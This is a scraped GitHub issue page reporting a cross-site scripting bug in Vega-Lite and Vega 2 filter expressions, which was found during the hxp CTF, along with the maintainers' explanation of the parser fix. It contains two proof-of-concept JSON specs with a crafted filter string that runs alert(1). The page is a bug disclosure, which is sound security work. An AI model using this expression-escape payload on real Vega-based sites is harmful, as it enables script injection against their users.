Lightrun
question-mark
Stuck on an issue?

Lightrun Answers was designed to reduce the constant googling that comes with debugging 3rd party libraries. It collects links to all the places you might be looking at while hunting down a tough bug.

And, if you’re still stuck at the end, we’re happy to hop on a call to see how we can help out.

XSS in transform filter

See original GitHub issue

This was found during the hxp ctf.

Credit

@cgvwzq and his writeup

  • Describe how to reproduce the bug / the goal of the feature request: Paste the below JSON in the Vega Editor. Working demo. You will see a ‘1’ alert dialog. To my understanding you should not be able to run arbitrary JS using vega-lite json, should you?
  • Provide an example spec in JSON, wrapped by triple backticks like this:
{
  "data": {
    "values": [{}]
  },
  "transform": [
    {"filter": "(0//1/)-'\\\n,alert(1))))//'"}
  ],
  "mark": "bar"
}

Issue Analytics

  • State:closed
  • Created 3 years ago
  • Comments:6 (5 by maintainers)

github_iconTop GitHub Comments

1reaction
jheercommented, Dec 21, 2020

The error stemmed from the removal of comments from our parser, which opened the door to seeing “division by a regexp” instead. PR #3019 updates the parser to instead throw when a single-line comment // is encountered, which is the intended design.

0reactions
domoritzcommented, Dec 21, 2020

The issue also exists in Vega 2.

{
  "data": [
    {
      "name": "data",
      "values": [{}],
      "transform": [
        {"type": "filter", "test": "(0//1/)-'\\\n,alert(1))))//'"}
      ]
    }
  ]
}

(try at https://vega.github.io/vega-editor/?mode=vega)

Read more comments on GitHub >

github_iconTop Results From Across the Web

Cross-Site Scripting (XSS) Cheat Sheet | Web Security Academy
This cross-site scripting (XSS) cheat sheet contains many vectors that can help you bypass WAFs and filters. You can select vectors by the ......
Read more >
Cross Site Scripting Prevention - OWASP Cheat Sheet Series
The purpose of output encoding (as it relates to Cross Site Scripting) is to convert untrusted input into a safe form where the...
Read more >
Our Favorite XSS Filters/IDS and how to Attack Them - Black Hat
Our Favorite XSS Filters/IDS and how to Attack Them. Most recent version of slides can be obtained from blackhat's website or http://p42.us/favxss/ ...
Read more >
A Pentester's Guide to Cross-Site Scripting (XSS) - Cobalt.io
Examine a common security vulnerability, Cross-Site Scripting (XSS). Exploring what it is, how to spot it, and a XSS cheat sheet.
Read more >
Advanced Techniques to Bypass & Defeat XSS Filters, Part 1
There is no shortage of defenses against cross-site scripting (XSS) since it is so prevalent on the web today. Filters are one of...
Read more >

github_iconTop Related Medium Post

No results found

github_iconTop Related StackOverflow Question

No results found

github_iconTroubleshoot Live Code

Lightrun enables developers to add logs, metrics and snapshots to live code - no restarts or redeploys required.
Start Free

github_iconTop Related Reddit Thread

No results found

github_iconTop Related Hackernoon Post

No results found

github_iconTop Related Tweet

No results found

github_iconTop Related Dev.to Post

No results found

github_iconTop Related Hashnode Post

No results found
Previous page

Applying the extent transform to a field that contains Date instances returns an array of timestamps

Next page

Add a single setting to scale all font sizes